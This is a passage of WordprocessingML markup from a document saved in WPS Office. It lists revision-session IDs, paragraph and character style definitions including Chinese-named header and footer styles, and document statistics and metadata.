    <w:rsid w:val="50900C5A"/>
    <w:rsid w:val="50FA6453"/>
    <w:rsid w:val="5117340D"/>
    <w:rsid w:val="513E6BB0"/>
    <w:rsid w:val="514C37A2"/>
    <w:rsid w:val="51703763"/>
    <w:rsid w:val="51921A53"/>
    <w:rsid w:val="51C81604"/>
    <w:rsid w:val="51CF58FB"/>
    <w:rsid w:val="51D443D7"/>
    <w:rsid w:val="51E03BB8"/>
    <w:rsid w:val="5222272C"/>
    <w:rsid w:val="52326C6A"/>
    <w:rsid w:val="52B4142D"/>
    <w:rsid w:val="52D054FC"/>
    <w:rsid w:val="52E05AC0"/>
    <w:rsid w:val="53107156"/>
    <w:rsid w:val="531B3DD9"/>
    <w:rsid w:val="5348712E"/>
    <w:rsid w:val="53510938"/>
    <w:rsid w:val="536270DB"/>
    <w:rsid w:val="537C334A"/>
    <w:rsid w:val="53803A05"/>
    <w:rsid w:val="53A019B1"/>
    <w:rsid w:val="53D63625"/>
    <w:rsid w:val="53E06252"/>
    <w:rsid w:val="53E977FC"/>
    <w:rsid w:val="54205F91"/>
    <w:rsid w:val="542909DD"/>
    <w:rsid w:val="542C4221"/>
    <w:rsid w:val="54350468"/>
    <w:rsid w:val="543F43BD"/>
    <w:rsid w:val="544F733A"/>
    <w:rsid w:val="54973F96"/>
    <w:rsid w:val="54A379AB"/>
    <w:rsid w:val="54BD13ED"/>
    <w:rsid w:val="54D45DB6"/>
    <w:rsid w:val="54FD052E"/>
    <w:rsid w:val="551E6B2A"/>
    <w:rsid w:val="552459FA"/>
    <w:rsid w:val="553A3D83"/>
    <w:rsid w:val="553B7BE4"/>
    <w:rsid w:val="55434FAF"/>
    <w:rsid w:val="55A416BE"/>
    <w:rsid w:val="55AD3F41"/>
    <w:rsid w:val="55BA0BC5"/>
    <w:rsid w:val="55FE4C5C"/>
    <w:rsid w:val="56031F51"/>
    <w:rsid w:val="560443FB"/>
    <w:rsid w:val="56066443"/>
    <w:rsid w:val="5616545C"/>
    <w:rsid w:val="568C34A1"/>
    <w:rsid w:val="56C113D0"/>
    <w:rsid w:val="56C15534"/>
    <w:rsid w:val="56E91134"/>
    <w:rsid w:val="56F50266"/>
    <w:rsid w:val="570F757A"/>
    <w:rsid w:val="572B0E10"/>
    <w:rsid w:val="57376AD1"/>
    <w:rsid w:val="57483CFE"/>
    <w:rsid w:val="57487D4A"/>
    <w:rsid w:val="57783371"/>
    <w:rsid w:val="578B6BE8"/>
    <w:rsid w:val="579B321D"/>
    <w:rsid w:val="57B95737"/>
    <w:rsid w:val="57C42DA3"/>
    <w:rsid w:val="57E02CC4"/>
    <w:rsid w:val="57EA769F"/>
    <w:rsid w:val="5809221B"/>
    <w:rsid w:val="583D3584"/>
    <w:rsid w:val="5852775E"/>
    <w:rsid w:val="58880728"/>
    <w:rsid w:val="588D223B"/>
    <w:rsid w:val="58C548C2"/>
    <w:rsid w:val="58E1624D"/>
    <w:rsid w:val="58F81962"/>
    <w:rsid w:val="5923659E"/>
    <w:rsid w:val="59600776"/>
    <w:rsid w:val="5961222A"/>
    <w:rsid w:val="597F2336"/>
    <w:rsid w:val="59D4022E"/>
    <w:rsid w:val="59D800F7"/>
    <w:rsid w:val="59E00D5A"/>
    <w:rsid w:val="5A2D1D9E"/>
    <w:rsid w:val="5A325C4A"/>
    <w:rsid w:val="5A3A2B60"/>
    <w:rsid w:val="5A4513F6"/>
    <w:rsid w:val="5A816276"/>
    <w:rsid w:val="5ABF4D36"/>
    <w:rsid w:val="5ACB37B8"/>
    <w:rsid w:val="5AE26D53"/>
    <w:rsid w:val="5AF0321E"/>
    <w:rsid w:val="5B38136D"/>
    <w:rsid w:val="5B483897"/>
    <w:rsid w:val="5B4C0672"/>
    <w:rsid w:val="5B4E4CAB"/>
    <w:rsid w:val="5B6E19CE"/>
    <w:rsid w:val="5B702981"/>
    <w:rsid w:val="5B7D7A78"/>
    <w:rsid w:val="5B9821F0"/>
    <w:rsid w:val="5BA8182F"/>
    <w:rsid w:val="5BA87F9D"/>
    <w:rsid w:val="5BE7274E"/>
    <w:rsid w:val="5C00788F"/>
    <w:rsid w:val="5C020BF1"/>
    <w:rsid w:val="5C5C77EE"/>
    <w:rsid w:val="5C7774D3"/>
    <w:rsid w:val="5C845E57"/>
    <w:rsid w:val="5C91458D"/>
    <w:rsid w:val="5C9D0E52"/>
    <w:rsid w:val="5CBA37E8"/>
    <w:rsid w:val="5CD83036"/>
    <w:rsid w:val="5D262A36"/>
    <w:rsid w:val="5D4076F6"/>
    <w:rsid w:val="5D543F38"/>
    <w:rsid w:val="5D8833F0"/>
    <w:rsid w:val="5D9556F6"/>
    <w:rsid w:val="5DC82230"/>
    <w:rsid w:val="5E1F3B6D"/>
    <w:rsid w:val="5E4D3C99"/>
    <w:rsid w:val="5E72408D"/>
    <w:rsid w:val="5E796A43"/>
    <w:rsid w:val="5E8D7089"/>
    <w:rsid w:val="5EA56ECA"/>
    <w:rsid w:val="5EA80FCC"/>
    <w:rsid w:val="5EB34BDC"/>
    <w:rsid w:val="5EB506B9"/>
    <w:rsid w:val="5ED03A93"/>
    <w:rsid w:val="5F0B08BE"/>
    <w:rsid w:val="5F335AED"/>
    <w:rsid w:val="5F6245C4"/>
    <w:rsid w:val="5FBD5D96"/>
    <w:rsid w:val="5FBE42CB"/>
    <w:rsid w:val="5FCC7229"/>
    <w:rsid w:val="5FCD7FD2"/>
    <w:rsid w:val="5FDA3101"/>
    <w:rsid w:val="6005151A"/>
    <w:rsid w:val="602D1129"/>
    <w:rsid w:val="60570CCE"/>
    <w:rsid w:val="605C74B3"/>
    <w:rsid w:val="607A0508"/>
    <w:rsid w:val="60804C75"/>
    <w:rsid w:val="60852143"/>
    <w:rsid w:val="608B3C69"/>
    <w:rsid w:val="60D36CFD"/>
    <w:rsid w:val="60D663C8"/>
    <w:rsid w:val="60E07891"/>
    <w:rsid w:val="61185F8D"/>
    <w:rsid w:val="61355334"/>
    <w:rsid w:val="614A3BE6"/>
    <w:rsid w:val="618B3CA1"/>
    <w:rsid w:val="61A75566"/>
    <w:rsid w:val="61BB52E0"/>
    <w:rsid w:val="61BE5C44"/>
    <w:rsid w:val="61FC5EDA"/>
    <w:rsid w:val="62153E49"/>
    <w:rsid w:val="62337403"/>
    <w:rsid w:val="623A1223"/>
    <w:rsid w:val="62641AF5"/>
    <w:rsid w:val="627D5367"/>
    <w:rsid w:val="62913539"/>
    <w:rsid w:val="6292056C"/>
    <w:rsid w:val="62A317FF"/>
    <w:rsid w:val="62CE5C27"/>
    <w:rsid w:val="62E86CFC"/>
    <w:rsid w:val="630B716B"/>
    <w:rsid w:val="63147CC6"/>
    <w:rsid w:val="632366D8"/>
    <w:rsid w:val="63443B83"/>
    <w:rsid w:val="638C45CB"/>
    <w:rsid w:val="63F7561D"/>
    <w:rsid w:val="64423F31"/>
    <w:rsid w:val="644A4B4A"/>
    <w:rsid w:val="646B30B2"/>
    <w:rsid w:val="647A3F6A"/>
    <w:rsid w:val="64E33DF4"/>
    <w:rsid w:val="65222B6E"/>
    <w:rsid w:val="656C64A8"/>
    <w:rsid w:val="65720290"/>
    <w:rsid w:val="65AC2FF2"/>
    <w:rsid w:val="662B4E16"/>
    <w:rsid w:val="66340858"/>
    <w:rsid w:val="66500EED"/>
    <w:rsid w:val="67122155"/>
    <w:rsid w:val="672C0E52"/>
    <w:rsid w:val="67564D51"/>
    <w:rsid w:val="676C502C"/>
    <w:rsid w:val="677B6565"/>
    <w:rsid w:val="67C42883"/>
    <w:rsid w:val="67C63C85"/>
    <w:rsid w:val="67DB076F"/>
    <w:rsid w:val="67E364E5"/>
    <w:rsid w:val="682D3D04"/>
    <w:rsid w:val="6837565A"/>
    <w:rsid w:val="685A617B"/>
    <w:rsid w:val="685C2BD2"/>
    <w:rsid w:val="6867608B"/>
    <w:rsid w:val="68792AA5"/>
    <w:rsid w:val="688D7AC5"/>
    <w:rsid w:val="68902A3B"/>
    <w:rsid w:val="68C270C6"/>
    <w:rsid w:val="68C5729B"/>
    <w:rsid w:val="68D347A9"/>
    <w:rsid w:val="68D575AA"/>
    <w:rsid w:val="68E90368"/>
    <w:rsid w:val="68FC4042"/>
    <w:rsid w:val="69144529"/>
    <w:rsid w:val="691F0159"/>
    <w:rsid w:val="692844CB"/>
    <w:rsid w:val="6956154C"/>
    <w:rsid w:val="69615439"/>
    <w:rsid w:val="697B1C0E"/>
    <w:rsid w:val="69C56A3B"/>
    <w:rsid w:val="69D361E5"/>
    <w:rsid w:val="69D65C6C"/>
    <w:rsid w:val="6A060680"/>
    <w:rsid w:val="6A061647"/>
    <w:rsid w:val="6A876FCF"/>
    <w:rsid w:val="6AC975E8"/>
    <w:rsid w:val="6AE34B4E"/>
    <w:rsid w:val="6AFA59F3"/>
    <w:rsid w:val="6B3929BF"/>
    <w:rsid w:val="6B43383E"/>
    <w:rsid w:val="6B4F21E3"/>
    <w:rsid w:val="6B833B93"/>
    <w:rsid w:val="6C022DB1"/>
    <w:rsid w:val="6C0528A2"/>
    <w:rsid w:val="6C2216A6"/>
    <w:rsid w:val="6C510171"/>
    <w:rsid w:val="6C5F6456"/>
    <w:rsid w:val="6C783074"/>
    <w:rsid w:val="6CD646CF"/>
    <w:rsid w:val="6CDC30D7"/>
    <w:rsid w:val="6CDF1C62"/>
    <w:rsid w:val="6CF110B0"/>
    <w:rsid w:val="6D0C7C9A"/>
    <w:rsid w:val="6D410C09"/>
    <w:rsid w:val="6D5238C5"/>
    <w:rsid w:val="6D605FE2"/>
    <w:rsid w:val="6D6E51D0"/>
    <w:rsid w:val="6D711A3A"/>
    <w:rsid w:val="6D8A6A17"/>
    <w:rsid w:val="6D8F2672"/>
    <w:rsid w:val="6D943EDD"/>
    <w:rsid w:val="6DD60C65"/>
    <w:rsid w:val="6DE309C1"/>
    <w:rsid w:val="6DEB3087"/>
    <w:rsid w:val="6DF42BCE"/>
    <w:rsid w:val="6E04448D"/>
    <w:rsid w:val="6E8E3022"/>
    <w:rsid w:val="6EAF43DA"/>
    <w:rsid w:val="6ECA57CB"/>
    <w:rsid w:val="6ECC38B8"/>
    <w:rsid w:val="6ED82121"/>
    <w:rsid w:val="6F164152"/>
    <w:rsid w:val="6F301732"/>
    <w:rsid w:val="6F654CF8"/>
    <w:rsid w:val="6F6C3363"/>
    <w:rsid w:val="6F706A1A"/>
    <w:rsid w:val="6FC24078"/>
    <w:rsid w:val="700417EE"/>
    <w:rsid w:val="703379DD"/>
    <w:rsid w:val="705B0CE2"/>
    <w:rsid w:val="709D7072"/>
    <w:rsid w:val="70C2594D"/>
    <w:rsid w:val="70FA6D60"/>
    <w:rsid w:val="710870BC"/>
    <w:rsid w:val="710C022E"/>
    <w:rsid w:val="7137174F"/>
    <w:rsid w:val="71381023"/>
    <w:rsid w:val="71435DE1"/>
    <w:rsid w:val="71494BA2"/>
    <w:rsid w:val="715C11B6"/>
    <w:rsid w:val="71645CE1"/>
    <w:rsid w:val="716B400E"/>
    <w:rsid w:val="717324A2"/>
    <w:rsid w:val="71754A5F"/>
    <w:rsid w:val="718020BB"/>
    <w:rsid w:val="718A3A61"/>
    <w:rsid w:val="718A7AD8"/>
    <w:rsid w:val="71A861A9"/>
    <w:rsid w:val="71BC1338"/>
    <w:rsid w:val="71D77212"/>
    <w:rsid w:val="725337DC"/>
    <w:rsid w:val="72565C05"/>
    <w:rsid w:val="7264331A"/>
    <w:rsid w:val="727E69BE"/>
    <w:rsid w:val="72A165FF"/>
    <w:rsid w:val="72A929B2"/>
    <w:rsid w:val="72B93A79"/>
    <w:rsid w:val="72C43F90"/>
    <w:rsid w:val="72D72F0A"/>
    <w:rsid w:val="73047586"/>
    <w:rsid w:val="731566B0"/>
    <w:rsid w:val="731F25E1"/>
    <w:rsid w:val="73267821"/>
    <w:rsid w:val="734829E0"/>
    <w:rsid w:val="735026D3"/>
    <w:rsid w:val="736A5E0C"/>
    <w:rsid w:val="738D2AD0"/>
    <w:rsid w:val="738E13CF"/>
    <w:rsid w:val="73A41C4D"/>
    <w:rsid w:val="73B26680"/>
    <w:rsid w:val="73B476CA"/>
    <w:rsid w:val="73D834C2"/>
    <w:rsid w:val="73ED07EB"/>
    <w:rsid w:val="740A73CA"/>
    <w:rsid w:val="741950ED"/>
    <w:rsid w:val="74943CF3"/>
    <w:rsid w:val="7496678D"/>
    <w:rsid w:val="74B12817"/>
    <w:rsid w:val="74C13B70"/>
    <w:rsid w:val="75005A8A"/>
    <w:rsid w:val="75034696"/>
    <w:rsid w:val="750505E9"/>
    <w:rsid w:val="75147553"/>
    <w:rsid w:val="75297601"/>
    <w:rsid w:val="754F71E0"/>
    <w:rsid w:val="757C5983"/>
    <w:rsid w:val="758008A1"/>
    <w:rsid w:val="7592028B"/>
    <w:rsid w:val="75E24969"/>
    <w:rsid w:val="762A1882"/>
    <w:rsid w:val="764C69B7"/>
    <w:rsid w:val="76AE3849"/>
    <w:rsid w:val="76BE1FCB"/>
    <w:rsid w:val="76F01FA7"/>
    <w:rsid w:val="76FA1BEC"/>
    <w:rsid w:val="77063A83"/>
    <w:rsid w:val="770C5919"/>
    <w:rsid w:val="773C7ABF"/>
    <w:rsid w:val="77476464"/>
    <w:rsid w:val="77616986"/>
    <w:rsid w:val="77642B72"/>
    <w:rsid w:val="777C78AD"/>
    <w:rsid w:val="779E1C6F"/>
    <w:rsid w:val="77CE281F"/>
    <w:rsid w:val="77D7323C"/>
    <w:rsid w:val="78497340"/>
    <w:rsid w:val="787D49A4"/>
    <w:rsid w:val="788177F5"/>
    <w:rsid w:val="78830A28"/>
    <w:rsid w:val="78931961"/>
    <w:rsid w:val="78DD2BDC"/>
    <w:rsid w:val="79052133"/>
    <w:rsid w:val="794A5A1C"/>
    <w:rsid w:val="796A32C0"/>
    <w:rsid w:val="797D7B45"/>
    <w:rsid w:val="799A0ACD"/>
    <w:rsid w:val="79A944B7"/>
    <w:rsid w:val="79CA11ED"/>
    <w:rsid w:val="79FC6DF1"/>
    <w:rsid w:val="7A021182"/>
    <w:rsid w:val="7A293259"/>
    <w:rsid w:val="7A396087"/>
    <w:rsid w:val="7A813A3B"/>
    <w:rsid w:val="7A903C7E"/>
    <w:rsid w:val="7A905E05"/>
    <w:rsid w:val="7AAC2EAD"/>
    <w:rsid w:val="7AE24CA4"/>
    <w:rsid w:val="7AE74A5D"/>
    <w:rsid w:val="7AEB2B28"/>
    <w:rsid w:val="7B026148"/>
    <w:rsid w:val="7B276391"/>
    <w:rsid w:val="7B39435C"/>
    <w:rsid w:val="7B4D150D"/>
    <w:rsid w:val="7B5D0004"/>
    <w:rsid w:val="7B8053B0"/>
    <w:rsid w:val="7BC938EC"/>
    <w:rsid w:val="7BED75DA"/>
    <w:rsid w:val="7BFB296D"/>
    <w:rsid w:val="7C0A2C05"/>
    <w:rsid w:val="7C4E63F5"/>
    <w:rsid w:val="7C514DCA"/>
    <w:rsid w:val="7C7374A8"/>
    <w:rsid w:val="7C7A7854"/>
    <w:rsid w:val="7C926ED7"/>
    <w:rsid w:val="7CA3413D"/>
    <w:rsid w:val="7CE02C9B"/>
    <w:rsid w:val="7CE16A13"/>
    <w:rsid w:val="7CE535BB"/>
    <w:rsid w:val="7D4E541A"/>
    <w:rsid w:val="7D596B9B"/>
    <w:rsid w:val="7D756300"/>
    <w:rsid w:val="7DA51F27"/>
    <w:rsid w:val="7DE8348E"/>
    <w:rsid w:val="7DEB6A0D"/>
    <w:rsid w:val="7DF804B8"/>
    <w:rsid w:val="7E1875BC"/>
    <w:rsid w:val="7E1E2B24"/>
    <w:rsid w:val="7E3C2153"/>
    <w:rsid w:val="7E9059CF"/>
    <w:rsid w:val="7F5462BC"/>
    <w:rsid w:val="7F557819"/>
    <w:rsid w:val="7F863357"/>
    <w:rsid w:val="7F9B10FB"/>
    <w:rsid w:val="7FAC753D"/>
    <w:rsid w:val="7FCF4A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adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="微软雅黑" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine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0"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine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15"/>
      <w:szCs w:val="15"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="8">
    <w:name w:val="Default Paragraph Font"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="7">
    <w:name w:val="Normal Table"/>
    <w:autoRedefine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12"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="11"/>
    <w:autoRedefine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6">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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Strong"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="5"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="4"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="13">
    <w:name w:val="自定义正文"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22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2018</Words>
  <Characters>3131</Characters>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3285</CharactersWithSpaces>
  <Application>WPS Office_12.1.0.17147_F1E327BC-269C-435d-A152-05C5408002CA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2008-09-11T17:20:00Z</dcterms:created>
  <dc:creator>华硕</dc:creator>
  <cp:lastModifiedBy>昵称</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-21T15:47:51Z</dcterms:modified>
  <cp:revision>41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2052-12.1.0.17147</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>08A74A00F2294C27A9AB1CAA15FAEFCA_12</vt:lpwstr>
  </property>
</Properties>
</file>